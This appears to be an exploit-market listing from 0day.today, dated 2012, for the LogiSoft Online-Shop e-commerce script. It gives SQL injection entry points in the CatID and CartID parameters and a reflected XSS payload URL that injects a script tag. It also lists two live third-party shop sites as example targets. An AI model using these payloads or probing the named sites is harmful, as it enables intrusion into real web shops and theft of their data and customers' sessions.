[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LogiSoft Online-Shop / E-Commerce-System Sql Injection/XSS Vulnerabilties

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18710
Category
web applications
Date add
20-06-2012
Platform
php
LogiSoft Online-Shop / E-Commerce-System Sql Injection/XSS Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.logisoft.be/
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================
http://SITE/index.php?CatID=sql
http://SITE/index.php?CartID=sql


Example:
http://www.alltronic.be/shop/
http://php.bene.ws/shop/



Reflected XSS
==============


http://SITE/index.php?CatID='"--></style></script><script>alert(1337)</script>


####################################################################### 



#  0day.today [2024-11-16]  #